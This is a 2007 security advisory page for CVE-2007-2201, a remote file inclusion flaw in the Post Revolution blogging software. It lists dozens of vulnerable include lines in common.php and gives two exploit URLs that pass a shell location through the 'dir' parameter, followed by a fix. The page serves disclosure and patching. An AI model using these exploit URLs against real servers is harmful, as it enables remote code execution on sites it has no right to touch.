|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2653 CVE : CVE-2007-2201 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : InyeXion Published : 02.05.2007
Advisory Content : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Post Revolution Remote File Inclusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2 Download..: http://www.fabio.com.ar/postrev/ Risk ..............: high Date .........: 25/3/2007 Found by ..........: InyeXion Contact ...........: InyeXion[at]gmail.com Web .............: Www.InyeXion.com.ar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Affected File: /common.php /themes/default/preview_post_completo.php Vulnerable Code: /common.php Line [10] include ($dir."themes/".$config_data["template"]."/encabezado.php"); Line [16] include ($dir."themes/".$config_data["template"]."/cuerpo.php"); Line [22] include ($dir."themes/".$config_data["template"]."/pie.php"); Line [37] include ($dir."themes/".$config_data["template"]."/menu_principal.php"); Line [49] include ($dir."themes/".$config_data["template"]."/error.php"); Line [129] include ($dir."themes/".$config_data["template"]."/login_form.php"); Line [135] include ($dir."themes/".$config_data["template"]."/logout.php"); Line [174] include ($dir."language/".$config_data["lang"].".php"); Line [272] include ($dir."language/".$config_data["lang"].".php"); Line [282] include ($dir."themes/".$config_data["template"]."/seccion.php"); Line [360] include ($dir."language/".$config_data["lang"].".php"); Line [446] include ($dir."themes/".$config_data["template"]."/post.php"); Line [460] include ($dir."language/".$config_data["lang"].".php"); Line [543] include ($dir."themes/".$config_data["template"]."/archivo_noticias.php"); Line [549] include ($dir."themes/".$config_data["template"]."/cuerpo_archivo.php"); Line [570] include ($dir."language/".$config_data["lang"].".php"); Line [628] include ($dir."themes/".$config_data["template"]."/post_completo.php"); Line [641] include ($dir."language/".$config_data["lang"].".php"); Line [661] include ($dir."language/".$config_data["lang"].".php"); Line [680] include ($dir."themes/".$config_data["template"]."/posts_usuario.php"); Line [692] include ($dir."language/".$config_data["lang"].".php"); Line [715] include ($dir."themes/".$config_data["template"]."/comment_encabezado.php"); Line [750] include ($dir."themes/".$config_data["template"]."/comment.php"); Line [770] include ($dir."themes/".$config_data["template"]."/comment_form.php"); Line [776] include ($dir."themes/".$config_data["template"]."/info.php"); Line [782] include ($dir."themes/".$config_data["template"]."/info.php"); Line [1054] include ($dir."language/".$config_data["lang"].".php"); Line [1106] include ($dir."themes/".$config_data["template"]."/encuesta_head.php"); Line [1124] include ($dir."themes/".$config_data["template"]."/encuesta_opc.php"); Line [1128] include ($dir."themes/".$config_data["template"]."/encuesta_pie.php"); Line [1159] include ($dir."themes/".$config_data["template"]."/encuesta_head_ver.php"); Line [1180] include ($dir."themes/".$config_data["template"]."/encuesta_opc_ver.php"); Line [1183] include ($dir."themes/".$config_data["template"]."/encuesta_pie_ver.php"); Line [1231] include ($dir."themes/".$config_data["template"]."/encuestas_anteriores.php"); Line [1242] include ($dir."themes/".$config_data["template"]."/tagmenu.php"); Line [1297] include ($dir."themes/".$config_data["template"]."/tagpost.php"); Line [1310] include ($dir."language/".$config_data["lang"].".php"); Line [1482] include ($dir."language/".$config_data["lang"].".php"); Line [1506] include ($dir."themes/".$config_data["template"]."/categoria_enlace.php"); Line [1521] include ($dir."themes/".$config_data["template"]."/enlacefila.php"); Line [1570] include ($dir."config.php"); Line [1676] include ($dir."language/".$config_data["lang"].".php"); Line [1678] include ($dir."themes/".$config_data["template"]."/buscar.php"); Line [1685] include ($dir."language/".$config_data["lang"].".php"); Line [1723] include ($dir."themes/".$config_data["template"]."/resultado.php"); Line [1730] include ($dir."language/".$config_data["lang"].".php"); Line [1766] include ($dir."themes/".$config_data["template"]."/busq-dato.php"); Line [1772] include ($dir."themes/".$config_data["template"]."/busq-resultado.php"); Line [1778] include ($dir."themes/".$config_data["template"]."/busq-resultado.php"); Line [1790] include ($dir."language/".$config_data["lang"].".php"); Line [1813] include ($dir."themes/".$config_data["template"]."/categoria_descarga.php"); Line [1834] include ($dir."themes/".$config_data["template"]."/descargafila.php"); Line [1875] include ($dir."language/".$config_data["lang"].".php"); Line [1892] include ($dir."language/".$config_data["lang"].".php"); Line [1908] include ($dir."language/".$config_data["lang"].".php"); Line [1924] include ($dir."language/".$config_data["lang"].".php"); Line [2061] include ($dir."include/anti-spam.php"); /themes/default/preview_post_completo.php Line [3] include ($dir."themes/".$config_data["template"]."/post_completo.php"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Exploit: http://[target]/common.php?dir=Shell http://[target]/themes/default/preview_post_completo.php?dir=Shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~ Fixed bug: /common.php and /themes/default/preview_post_completo.php insert if((isset($_REQUEST['dir']) || isset($_GET['dir']) || isset($_POST['dir'])) && !defined("dir")){ die("Fixed bug by InyeXion."); } ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |